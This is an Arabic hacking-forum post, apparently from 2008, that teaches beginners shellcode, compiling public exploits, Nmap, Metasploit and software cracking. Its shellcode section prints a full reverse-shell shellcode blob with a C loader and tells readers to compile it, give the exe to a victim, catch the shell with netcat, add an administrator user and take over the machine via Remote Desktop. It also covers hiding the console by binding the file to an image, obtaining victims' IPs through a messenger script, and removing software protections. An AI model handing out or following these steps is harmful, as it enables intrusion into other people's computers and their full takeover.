عرض مشاركة واحدة
قديم 11-09-2008, 03:16 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
MrXRoMaNcE1
VBSPIDERS TEAM
 
الصورة الرمزية MrXRoMaNcE1
 

 

 
إحصائية العضو






MrXRoMaNcE1 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
MrXRoMaNcE1 is on a distinguished road

افتراضي موضوع مهم لكل مبتدأ ونآوي يتحسن بالمجآال ..


.:: [ بســم اللهـ الرحمـن الرحيـم ] ::.

السلآم عليكم يآ شبآب ان شآء اللهـ, بخير , طبعآ تحديث للموضوع القديم وعدلت اشيآء كثيرة واضفت اشياء ثانيه ..

تقسيم الموآضيع :-

[~] : مقدمة
[~] : شل كــ,ــود
[~] : ترجمة الثغرآت
[~] : ثغرآت
[~] : Nmap
[~] : ميتآسبلويت
[~] : Assembly / C++ , C
[~] : الهندسة العكسية
[~] : مرآجع


------------------------------------[ 0x01 : Introduction ]------------------------------------

المهم اليوم رآح اشرح شرح مبسط

للثغرآت للي تنزل بالـ Milw0rm + الـ MetaSploit

موضوعي اليوم يتحدث عن الثغرات الطفح [ OverFlow ] , حجب الخدمة [ Dos/Poc ]

شرح طريقة الاختراق باستخدام الشيل كود [ Shell code ]

وبرنآمج [ Metasploit ] , والفحص بآستخدآم [ Nmap ] , وآخيرآ [ Reverse Engineering ]

طبعآ يآ شبآب هآي الطرق مآتنفع للاخترآق العشوآئي , بس للاخترآق المستهدف

ولآزم احيانا تحتآج آي بي الشخص المستهدف باي طريقه تجيب الأي بي مب مشكله

وعندك طريقه سحب الأي بي من المسنجر عن طريق سكربت IP GET

وبالنسبة للهندسة العكسية فسوف يتم طرح جميع الادوآت الخآصة والمهمة .

والحين نبدآ بتعريف وتوضيح اهم المصطلحآت وبعدين نفصل كل شيء عشآن مآيصير اي

لخبطه بالموضوع ..

------------------------------------[ 0x02 : ShellCode ]------------------------------------




الـ Shell code

هو كود لبرنآمج ويكون بالاسمبلي بصيغه Opecode ومآ يتعآمل الا مع الذآكرة يعني مبآشرة وعشآن كذآ قلت اسمبلي لانه يعتبر الاقرب للغه الحآسب , ويؤدي لـ / اضافه يوزر / دآونلودر , بآتش / تنفيذ اوآمر الدوس / اتصآل عكسي / اتصآل مبآشر / وحقن ملفآت الـ DLL

يعني حسب حآجتك من الثغرة وتقتدر تكتب ينفسك اذا تعلمت الاسمبلي والسي .

وهو يوجد بكل ثغرآت الريموت واللوكل عشآن نقدر نتحكم بالنظآم

وفي اشياء ثانية , بس اكثر الأشياء للي رآح نحتآجهآ هي

Bind Shell = اتصآل مبآشر

Reverse Shell = اتصآل عكسي ( افضل واقوى )

طبعآ يآ شبآب الثغرآت تجي بمختلف لغآت البرمجه وكل ثغرى تكون غير عن ثغرة ثآنية

نركز شوي ع الشل كود طبعآ قلنا قبل انه يكون بالاسبلمي او بالسي بس يفضل اسمبلي ومن ثم نحوله لصيغه الـ Opecode

مثلا هذه التعليمه :

كود PHP:
#include<stdio.h>

int main(){
    
       exit(
0);

الحين هذه برنآمج بسيط جدآ بالسي ووظيفته وآضحه اعتقد المهم ..

نحوله للاسمبلي وبيكون على هذآ الشكل :

كود PHP:
Section .text

global_Start

start_
:

mov $0x0,%ebx
mov 
$0x1,%eax
int 0x80 
وبعد مآ نشغله ببرنآمج Objectdump

رآح يكون كذآ :

bb 00 00 00 00
b8 01 00 00 00
cd 80

وآخر شيء لازم نعدل عليه ورآح يكون كذآ بالسي طبعآ:

كود PHP:
"\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80" 
وهذآ استدعآءه بالسي

كود PHP:
#include<stdio.h>

char exitshell[]="\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80";

int main(){

          
int *ret;
          
ret =(int*)&ret+2
          
(*ret)=(int)exitshell;

طبعآ موضوع الشل كود يطول كثير ويخطئ من يظن الشل كود للثغرآت فقط ..

فيمكن استخدآمهآ بالبرآمج ايضآ لتسريع الادآء وصغر الحجم كمآ يحدث مع سيرفر البيوزن ..

فأغلب اجزآءه بالاسمبلي + الشل كود

المهم نآتي لاهم المرآجع القوية للشل كود ..

اول كتآب واهمهم : The.Shellcoders.Handbook

صورة للكتآب :



طبعآ ينصح به بشده من يريد التعلم كشف الثغرآت وكتآبة الشل كود

التحميل :The.Shellcoders.Handbook

#~

الكتآب الثاني وايضآ شآمل : Shellcoder's Programming Uncovered

صورة للكتآب :



التحميل : Shellcoder's Programming Uncovered

#~

وآخر شيء بقيه الكتب الصغيرة والمقالاات

التحميل : Shellcode.Text

#~

والحين نشرح اهم مصطلحآت للشل كود في موقع الـMetaSploit

اول شيء ندش علىآ هآي الرآبط

الرآبط : Win32.Shellcode

طبعآ انا مختآر نظآم ويندوز بيئة 32 بت

وهاي هو المستخدم الاكثر وتقتدر تختآر لنظآم الـ Linux اذا حبيت تخترق اجهزة بنظآم ليونكس

المهم تآبعوآ


Windows Bind DLL Inject = يعني حقن ملف ربط دينامكي ( اتصآل مبآشر )

Windows Bind Shell = شل كود وضيفته فتح منفذ و الأتصآل المبآشر به

Windows Executable Download and Execute = شل كود وضيفتهآ تحميل وتنفيذ كود جميل لمحبين برآمج الأخترآق

Windows Execute Command = تنفيذ احد اوآمر الدوس , تشغيل الحاسبه او اضافه يوزر للي تبيه بالدوس

Windows Execute net user /ADD = اضافه يوزر للنظآم ونقدر نسيطر عليه من الـ Remote Desktop

وينفع لاصحآب اخترآق الموآقع اضافه يوزر روت

Windows Reverse DLL Inject = حقن ملف ربط دينامكي ( اتصآل عكسي )

Windows Reverse Shell = كود وضيفته الأتصآل العكسي ورآح يكون مستخدم بشكل كبير بالثغرآت لقوته وسيطرته الكآمله ع النظآم .

ورآح يكون الأخترآق عن طريق الـ Net Cat يعني تسوي تنصت لين يشبك الضحية مع جهآزك

وتتقدر بعد اذا تبي يكون التبليغ ع برنآمج اخترآق

ورآح اشرح كل شيء بفقرة لحآله

------------------------------------[ 0x03 : Translation Exploits ]------------------------------------

وطريقه التعرف ع الثغرآت وآضحة جدآ بس رآح نذكرهآ + شرح فيديو لطريقه الترجمه

ومرفقه معهم الادوآت للترجمه

يلا نبدآ :


اول شيء الـ php ويبدآ كذآ : php?>

والحين هذا هو الشرح : PHP

المترجم مرفق

#~

ثآني شيء الـ Perl ويبدآ كذآ : /usr/bin/perl#!

والحين الشرح : Perl

المترجم مرفق

#~

ثآلث شيء الـ C++\C ويبدآ كذآ

كود PHP:
#include<stdio.h> 
شرح الترجمه : C++\C

موقع لتحميل المترجم : http://www.bloodshed.net/dev/devcpp.html

#~

رآبع شيء الـ python ويبدآ كذآ : /usr/bin/env python#!

شرح الترجمه : Python

المترجم : http://www.python.org/download/

#~

خآمس شيء الـ Ruby ويبدآ كذآ : /usr/bin/ruby#!

شرح الترجمه : Ruby

المترجم : http://www.ruby-lang.org/en/downloads/

وبكذآ خلصنآ من دروس ترجمة الثغرآت


------------------------------------[ 0x04 : Exploits ]------------------------------------

اول شيء نشوف طريقه تقسيم الثغرآت للي تنزل بالـ Milw0rm


نبدآ




الـ Remote

تعتبر من اخطر واقوى انوآع الثغرآت يعني تحكم عن بعد والصرآحة هي من افضل الانوآع واسهلهآ

وهي دآيمآ تكون من نوع 0-Day يعني ثغرة مميته وخطيره ويشترط وجود برنآمج بجهآز الضحيه





الـ Local

يعني تطبيق محلي ويختلف شوي عن الريموت

بس يظل الريموت اقوى واحسن , زي اللوكل روت يعني تغيير الصلاحيآت من اليوزر للادمن




الـ dos/poc

وهي ثغرات حجب الخدمة (denial of service)

وهو احيانا يكون مجرد تهنيق للجهآز

او يسوي له كرآش [ Crash ]

بشرط يكون البرنآمج منصب ع الجهآز

مثلا لو لقيت كرآش في برنآمج PhoTo Shop ونزلت الملف

رآح يصير التهنيق / الكرآش

يلا نبدآ اول شيء بالـ Remote

طبعآ يختلف نوع الثغرة في ثغرآت تكون بصيغه HTML ولآزم الشل كود يكون مشفر بلغه الجآفآ

اما اذا كآنت الثغرة مكتوبه بالسي عآدي نترجم علاطووووول

نختآر اي ثغرة مثلا آخر وحده نزلت : http://www.milw0rm.com/exploits/5827

طبعآ الشل كود يكون جآهز واذا مآعجبك نوع الشل كود تقدر تغيره بشرط الشل كود مآيكون كبير عن للي موجود

بالثغرة ولو كآن اصغر منه عآدي مآفي مشآكل

نبدآ نشرح تفاصيل الثغرة




يعني الثغرة بلغه الـ C





وهني يقولك الشل كود وظيفته الأتصآل المبآشر Bind Shell


ويفتح بورت في الجهآز 9998

وحجم الشل كود 317 بآيت يعني اذا حبيت تغير الشل كود لآزم تجيب وآحد نفس الحجم او اصغر منه




هني يقولك حجم الفيض بالذآكرة 10000 بآيت لاتغيره لانه حجم الثغرة كبير شوي


والحين خلصنآ للي عليك تترجم الثغرة وتطبق الثغرة اذا كنت منصب البرنآمج ورآح تشتغل معآك الثغرة زين

#~

الحين نروح لثغرة ثآنية وهي ثغرة ببرنآمج Xchat

وهآي الثغرة لازم تكون صيغتهآ HTML

ولآزم الشل كود يكون مشفر بلغه الجآفآ



نشرح التفاصيل




يعني يقولك بالملاحظة لازم الشل كود ينفذ آمر تشغيل الالحاسبه

ونبدآ ننسخ الثغرة من HTML وتحت ورآح نحصل مكتةب بنص الثغرة


Command Shell calc


يعني نسوي شل كود ينفذ آمر تشغيل الاحاسبه


ندخل ع الموقع الميتآ : Win32.Shellcode

ونختآر



يعني تنفيذ اوآمر الدوس

ويوم تضغط ع الرآبط رآح يجيك كذآ



في المربع الاول كتب آمر الدوس وهو تشغيل الالحاسبه

والامر الثاني خله زي مآهو لاتغيره

وآخر شيء اضغط تكوين



وبعد مآنضغط تكوين رآح يطلع لنآ الشل كود لتشغيل الالحاسبه




الحين كل شيء وآضح ننسخ الشل كود ونحطه بالثغرة .. بس قبل كل شيء

احنآ قلنآ الثغرة مكتوبه بالـ HTML

يعني مآينفع نحط شل كود مكتوب بالسي او البيرل ولآزم نحول الشل كود من السي او البيرل للجآفآ سكربت , واحنآ لازم نختآر البيرل لانه الادآة تطلب البيرل فقط , طبعآ الكل لاحظ مآفي فرق بالشل كود الا بتعريف المتغير وهذآ مهم ..

لانه تعريف المتغير يختلف من السي للبيرل ..

والحين نحول الشل كود الى الجآفآ سكربت عن طريق هآي الأدآة .

المكتوبه بالبيرل ( من طرح الأخ العزيز بروتو مآن )



لآحظ معآي الادآة يوم فتحته بالمفكرة

موجود دآخلهآ شل كود ولآزم نستبدل الشل كود الموجود بالادآة للي كونآه قبل شوي

الحين ننسخ الشل كود للي سوينآه ونحطه بالادآه عشآن يحول لنآ الي لغه الجآفآ عشآن المتصفح يقدر يشغله

هذآ هو ننسخه



ونحطه بالادآة

وبعد مآحطينآه نحفظ الشغل كله ونحط الادآة بالسي ونترجمهآ



على مأظن كل شيء وضح الحين شغلنآ الأدآة وشفر لنآ الشل كود الى الجآفآ والحين نحط هآي الكود

بالثغرة ونجرب نشغله ورآح يشتغل باذن الله

واما الأدآة للي تحول الشل كود للجآفآ حملهآ من هآي الرآبط

الرآبط :/ Convert To Java Script

#~

الحين خلصنآ من ثغرآت الريموت وتكون اغلبهآ زي كذآ

واللولكل تقريبا زي الريموت ويختلف في شويه اشياء والفرق ليس كبير

والحين ثغرآت حجب الخدمه الـ dos/poc

وهي ثغرآت مآتخليك تخترق الجهآز يعني زي مآوضحنآ قبل مجرد تهنيق او كرآش

للجهآز وهو يكون بأي امتدآد كآن فهو يعتمد على البرنآمج المصآب فآذآ كآن برنآمج Adobe Reader

مصآب فسوف يكون الكرآش من نوع pdf وهكذآ مع كل برنآمج ويوجد به الخطأ

مثال :

http://www.milw0rm.com/exploits/5918

الكرآش في برنآمج uTorrent

وهي مكتوبه بلغه البيرل ننسخهآ في المفكرة ونحول الصيغه الي .pl

وونقل الملف للـ c

ونترجمه ورآح يطلع لنآ زي كذآ



نكتب الأي بي وبعدين البورت وبعدين اليوزر + البآس

ورآح تشتغل وفي اكثر من طريقه

في ثغرآت بمجرد انك تعطي ملف للضحية يبدآ جهآزه يعلق ويصير له بطأ شديد

#~

الحين ننتقل لاحسن شيء بالموضوع الـ Shell code

ورآح اذكر كيف تخترق بدون ثغرآت يعني بس تحتآج لشل كود خآص فيك واخترق

ولا رآح نستخدم لا ثغرى ريموت ولآ شيء

الحين روح للميتآ كالعاده كآنك تسوي شل كود والحين اختآر

Reverse Shell = اتصآل عكسي



ورآح يجيك زي كذآ تآبع



في المربع الأول اكتب آي بي جهآزك

واكتب المنفذ المفتوح عندك والحين

اضغط على تكوين



وبعد مآتضغط على تكوين انسخ الشل كود



وحطه بين ذآ الكود

كود PHP:
#include <stdio.h>
char shellcode[]=
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf3"
"\x75\x47\x94\x83\xeb\xfc\xe2\xf4\x0f\x9d\x03\x94\xf3\x75\xcc\xd1"
"\xcf\xfe\x3b\x91\x8b\x74\xa8\x1f\xbc\x6d\xcc\xcb\xd3\x74\xac\xdd"
"\x78\x41\xcc\x95\x1d\x44\x87\x0d\x5f\xf1\x87\xe0\xf4\xb4\x8d\x99"
"\xf2\xb7\xac\x60\xc8\x21\x63\x90\x86\x90\xcc\xcb\xd7\x74\xac\xf2"
"\x78\x79\x0c\x1f\xac\x69\x46\x7f\x78\x69\xcc\x95\x18\xfc\x1b\xb0"
"\xf7\xb6\x76\x54\x97\xfe\x07\xa4\x76\xb5\x3f\x98\x78\x35\x4b\x1f"
"\x83\x69\xea\x1f\x9b\x7d\xac\x9d\x78\xf5\xf7\x94\xf3\x75\xcc\xfc"
"\xcf\x2a\x76\x62\x93\x23\xce\x6c\x70\xb5\x3c\xc4\x9b\x85\xcd\x90"
"\xac\x1d\xdf\x6a\x79\x7b\x10\x6b\x14\x16\x26\xf8\x90\x5b\x22\xec"
"\x96\x75\x47\x94"
;


main()
{
void (*routine) ();
(
longroutine = &shellcode;
routine(); 

بدل الشل كود للي موجود بالادآة بالشل كود للي سوينآه الحين

وبعدين احفظ الملف بآمتدآد .c

والحين ننترجم الادآة , وانا نزلت درس كيف نترجم الثغرآت الادوآت

بعد الترجمه رآح يكون الأمتدآد exe

عطه الملف اي وآحد وسوي تنصت للنت كت

ع البورت للي حطيته يوم سويت الشل كود وانا اخترت بورت 3460

للي هو بورت البيوزن مب مهم انت اختآر اي بورت ينآسبك

تآبع



نسوي تنصت نفس مآقلنآ ع البورت للي حددنآه عن طريق هآي الأمر

كود PHP:
---
ونتكب بعد الـ p

البورت

وبعد مآشغلت الشل كود المترجم

اتصل مع جهآزي ورآح يكون كذآ



والحين نفذ اوآمر الدوس على رآحتك وتقتدر تضيف يوزر او تغير بآس الأدمن عشآن نتحكم يجهآز الضحية

عن طريق الـ Remote Desktop

وللي مآفهم الشرح الشل كود يحمل الشرح فيديو من ذآ الرآبط

الرآبط :/ Shellcode Vedio

واما ادآة النت كت معظمكم عنده وهو موجود مع برنآمج الـميتآ سبلويت

#~

والحين ننتقل لخيآر Windows Execute net user /ADD

ويعني اضافه يوزر للنظآم وحتى اصحآب اخترآق الموآقع يقدرون بستفيدون منهآ

المهم



والحين بعد مآتضغط سوي زي مآهو موضح



في المربع الأول البآس ورد لليوزر

والثآني اسم اليوزر

وحطه بالادآة للي حطيانه للاتصآل العكسي وترجم الثغرة

وبعدين عطه لاي وآحد

واذا الضحية شغل الملف رآح ينضآف يوزر جديد للجهآز ونقدر نستفيد عن طريق التحكم عن بعد

Remote Desktop

نحط آي بي ضحيتنآ وبعدين نتكب اليوزر للي انضآف للنظآم وبعدين البآس

ورآح يدخل معآك وتمتع تحكم كآمل للضحية

شرح الفيديو من ذآ الرآبط

الرآبط : / ADD USER Vedio

في الأخير عشآن شاشه الدوس مآتطلع لك

ادمج الملف مع برنآمج صورة اي شيء تبيه او اضغط الملف باي اداه ضغط , وان شآء الله تختفي الشاشه

والحين هذه كتب لكشف ثغرآت

الـ Overflow

صورة الكتآب :



التحميل : Buffer Overflow Attack

#~

كتآب آخر مفصل وبالنسبة للمعلومآت فهو جيد .

للتحميل : A Buffer Overflow Study - Attacks and Defenses

#~

وهذه مجموعة كتب بالعربي بالضبط كتآبين

للتحميل : Buffer Overflow
Arabic


#~

وهذآ موقع يه شروحآت بسيطة لكشف الثغرآت : Bug Hunter

#~

وهذآ شرح فيديو لكشف ثغرة ببرنآمج من البدآية للنهآية : Find Exploit

وبكذآ خلصنآ من الثغرآت ..

------------------------------------[ 0x05 : Nmap ]------------------------------------

وهو يعتبر من اقوى برآمج الفحص بالعالم ان لم يكن الوحيد ..

الصرآحة هو ليس مجرد فآحص للبورتآت وانمآ يكشف نوع النظآم واصدآرة ويكشف المآك ادرس والبروتوكلات وتخطي الفايرول عن طريق اوآمر فحص انت تحدده

والامر سهل جدآ
اولا : عليك تحميل البرنآمج

الموقع الرسمي : http://nmap.org

صفحة التحميل , واذهب لقسم ويندوز وقم بالتحميل ..

http://nmap.org/download.html

واذا اردت وآجهة رسومية مع البرنآمج : Nmap GUI
تحت بيئة الدوس : Nmap Console

طبعآ بعد التنصيب العملية جدآ سهله قم بفتح البرنآمج اذا اخترت الوآجهة الرسومية وضع الاي بي المرآد فحصه وانتهى ..

اما بالنسبة للدوس الامر ايضا سهل ببدآية كل فحص اكتب nmap ثم الامر ثم الاي بي او اسم الموقع لاكن يفضل الاي بي حتى يكون الفحص اسرع !


مثآل : nmap -v -A scanme.nmap.org

والاوآمر كثيرة واذا حبيت تتعرف عليهآ اكتب الامر :

nmap -h

ورآح يطلع لك كل الاوآمر ..

وهذآ رآبط كتآب يشرك لك الاوآمر بشكل مفصل : Nmap Tutorial

طبعآ البرنآمج سهل جدآ بسآعآت قليلة عرفت اغلب الاوآمر !

وبكذآ خلصنآ من Nmap وهي ادآة الفحص


------------------------------------[ 0x06 : Metasploit ]------------------------------------


ادآة قوية وسهله جدآ مجآنية ومفتوحة المصدر تعمل على كل انظمة التشغيل فكرتهآ

الاساسية تعتمد فقط على تسهيل استغلال الثغرآت , يعني عطني الثغرة وانا استغلهآ

طبعآ الثغرآت تكتب بلغة الروبي وفيهآ ثغرآت قديمة يعني معظم الثغرآت مآمنهآ فايدة الا بحالة

الضحية جهآزة قديم او مب محدث !

او اذا كنت محترف وكشفت ثغرة خطيرة رآح تقتدر تضيف الثغرة وتستغلهآ مبآشرة بدون مشآكل

وطبعآ البرنآمج يتكون من جزيئين ..

جزء للاستغلال تحت بيئة الكونسول (الدوس)

وجزء بوآجهة مرئية اسهل نوعآ مآ لاكن افضل الكونسول ..

يلا نبدآ :-



Metasploit 3 GUI : الاستغلال بوآسطة الوآجهة الرسومية يعني مجرد ضغطآت
Metasploit 3 Web : تحت بيئة الكونسول لاكن مطورة اكثر وفيهآ محرك بحث وثيمآت
Online Update : من اسمه التحديث , ويشمل تحديث الثغرآت والادوآت
Tools : ادوآت تأتي مع البرنآمج مثل : Netcat , Putty , VNCViewer

والحين نجي لاهم المصطحلآت والاوآمر ..

طبعآ الحين رآح اقسم الفيديو لجزيئين جزء لتحت بيئة الكونسول وجزء للوآجهة الرسومية

واما فيديوهآت لاستغلال الثغرآت بآخر الشرح المهم نبدآ بالشرح :-

طبعآ توضيح لاهم الاوآمر

RHOST = آي بي الضحية

بعد الاحيآن لا تجد كلمه RHOST وانمآ تجد البدآية قريبة من اسم الثغرة المهم امام كل مصطلح تلقى تعريف له يعني لاتخآف

#~

LHOST = آي بي جهآزك

#~

PAYLOAD = البايلود او الشل كود

#~

info = اختصآر لـ Information وهي امر استخرآج معلومآت عن الثغرة

#~

show options = اظهآر خيآرآت الثغرة

#~

شروحآت الفيديو :-

DownLoad Metasploit GUI

DownLoad Metasploit Console

في الاخير مجموعة شروحآت لتطبيق مختلف الثغرآت جمعتهآ لكم من موآقع مختلفة , شروحآت زينة وسهله

للتحميل : Metasploit[mr.patch]

وبكذآ تكلمنآ عن الميتآسبلويت

------------------------------------[ 0x07 : Assembly / C++ , C ]------------------------------------

خبير لغه سي + خبير اسمبلي = خبير انظمة وكآشف ثغرآت !

شيء معروف لغة السي والاسمبلي طبعآ كبدآية تعلم لغه سي ولهآ مرآجع كثيرة قد شعر رآسك ...

وبالنسبة للغه سي فهي تعد من اقوى اللغآت واسرعهآ وبهآ كتبت انظمة التشغيل

ويندوز , ليونكس , يونكس , مآكنتوش وكل انظمة التشغيل نظرآ لسرعة اللغه وربطه بالعتآد

وطبعآ الاسمبلي مهم ايضآ للهندسه العكسية وكشف الثغرآت او ترقيعهآ

فالبدآية رآح ارفق كتب عربية للغة سي وبعدين الاجنبية , نبدأ :-



كتآب : لغة C الشآمل لخليل اونيس

#~



كتآب : الاكسير لسلطآن الثبيتي

#~

الحين المرآجع الاجنبية , طبعآ افضل بكثير وكونهآ معتمدة بكثير من جآمعآت العالم



كتآب : C++ How to Program, Fifth Edition

#~



سلسلة معروفة جدآ وانصح كل مبتدا فيهآ

كتآبSams Teach C in 21 Days 6E :

وهذآ موقع انصح فيه للي نآوي يبدآ : C++ .C

#~

الحين نجي للاسمبلي ..

رآح ارفق كتآب عربي وكتآب اجنبي :-

الكتآب العربي : Assembly All

#~

الكتآب الاجنبي : The Assembly Programming Master Book

وبكذآ تكلمنآ نبذة عن اهم لغآت البرمجة


------------------------------------[ 0x06 : Reverse Engineering ]------------------------------------

الهندسة العكسية طبعآ هو مب يعني كسر برنآمح بحد ذاته وانمآ فهم كيفية عمل البرنآمج او

كشف عيوبه وكتآبه ثغرآته او تقليد له

وطبعآ احنآ رآح نتكلم عن كسر البرآمج وبعدين انت تقدر تبحث عن المزيد اذا حبيت ..

اول برآمج واهمهم :-

http://www.ollydbg.de/

برنآمج Olly من افضل برآمج التنقيح ع الاطلاق طبعآ المجآني وفي وآحد بفلوس اسمه IDA

حمل برنآمج Olly واذا حبيت اضافآت للبرنآمج تجد بهذآ الصفحة

http://www.tuts4you.com/download.php?list.3

تجد كل مآيخص البرآمج من شروحآت اودوآت , واذا حددت للاضآفآت روح لقسم

OllyDbg Plugins

المهم نجي ونحمل بآقي الادوآت المهمة جدآ

#~




Import RE

برنآمج معروف وقوي جدآ يقوم يتصليح الـدوال وتركيبه للدوال المفقودة بالبرنآمج ويستعمل كثير

بكسر التشفير حيث بعد فك الضفط او التشفير تكون هنآك دوال مفقودة ويقوم البرنآمج باضآفتهآ

للتحميل : Import RE

#~



برنآمج لتحرير الرسورس سهل وخفيف ومحمول واما التسجيل تجده بالمرفق

التحميل : Restorator

#~



اقوى برآمج للتحكم ببنية البرآمج الـ PE طبعآ تقتدر تضيف قسم جديد بحال مآلقيت Code Cave

وتحكم شآمل وقوي جدآ

للتحميل : Lord PE

#~



برنآمج معروف لمعرفة البرنآمج باي لغة مكتوب ويظهر لك اذا كآن البرنآمج مشفر او مضغوط ..

للتحميل : PIED

#~

الحين خلصنآ من اهم الادوآت وفي ادوآت كثيرة جدآ لاكن طرحت اهمهآ ..

الحين نجي لبعض الدروس بالهندسة العكسية ..

اول شيء اظن تشفير بنقط الادخال معروف وانشرح اكثر من مرة لاكن رآح اطرح درس مميز

الصرآحة وهو على هآي الرآبط : خطي برآمج الحمآية

#~

الشرح الثاني حقن دوآن لودر بملف تنفيذي كآمل

لتحميل الدرس هنــ,ـــــآ

#~

كتآب الفريق العربي للبرمجة الاصدآر الاول !



للتحميل : كتآب الفريق العربي للهندسة العكسية

------------------------------------[ 0x06 : References ]------------------------------------

آخر شيء بالموضوع مرآجع مهمة لكل مبتدأ ..

طبعآ مرآجع مهمة جدآ ورآح تفيدك كثير

اول شيء من احسن الموآقع العربية للهندسة الهكسية

www.at4re.org/f/ & www.aoreteam.com/vb

وهذآ موقع للبرمجة صآر له اكثر من 8 سنوآت فيه موآضيع جد قوية : http://www.arabteam2000-forum.com/

اما الموآقع الاجنبية هذآ هو : www.tuts4you.com

فيه كل شيء دروس اسئلة مرآجع ادوآت تحديآت

#~

موقع عربي متميز دآئمآ يقدم الجديد هذآ هو : http://www.s4cnc.com/

واذا حبيت تشوف موآضيع JAAS المميزة شوف هنآ : http://www.s4cnc.com/paper/

مدونة احد خبرآء انظمة ليونكس وفيه موآضيع زينة ومفيدة : http://br4v3-h34r7.com/

وهذآ موقع اذا حبيت تحمل كتب برمجة شبكآت اي شيء يتعلق بالحآسب : http://www.q1nx.com/books/

وفي موقع الطآرق بعد لاكن مآعندي الرآبط حاليا .

#~

موآقع هكر اجنبية , طبعآ كثيرة لاكن رآح اطرح الافضل ..

موقع تعلم منه مبرمجين كبآر وكآن ملتقى لهم وفيه دروس قوية وسروسآت كثيرة لبرآمج اخترآق ودمج وتشفير هذآ هو : http://www.opensc.ws/

موقع جيد وفيه مخترقين على مستوى وموآضيعهم زينه وطبعآ يتطلب تسجيل بالمنتدى : http://www.h4cky0u.org/index.php

من افضل موآقع الهكر الاجنبية وفيه شروحآت كثيرة هذآ هو : http://www.blackhat-forums.com/

موقع شآمل وفيه كل مآيحتآجه الهكر ادوآت لوكلات روت كيت كل شيء : http://packetstorm.linuxsecurity.com/

في الاخير اتمنى الموضوع يعجبكم واتمنى لو افادكم , واتمنى عدم استخدآم اي شيء بالموضوع لاذية المسلمين وانا برئ برآءة الذئب من دم يوسف اذا صآرت

مشآكل , طبعآ الكل لاحظ طرحت كتب اجنبية وشروحآت كذلك : شبآب اللغه مهمة اذا حبيت تتعلم اي شيء فكل شيء صآر بالانجليزي اذا حبيت تتطور من نفسك

واذا مآفهمت شيء عندك خدمه قوقل لترجمه الموآقع او لترجمة النصوص او برنآمج الوآفي للي يعجبك اهم شيء لا تضيع وقتك على تفآهآت لاتودي وتجيب ..

واذا في خطآ بلغوني والانسآن مب معصوم عن الخطأ

ولاتنسى ذكر الله , في امان اللهـــ

منقوول للفائده


l,q,u lil g;g lfj]H ,kN,d djpsk fhgl[Nhg >>

التوقيع

 


التعديل الأخير تم بواسطة MrXRoMaNcE1 ; 11-09-2008 الساعة 03:20 PM.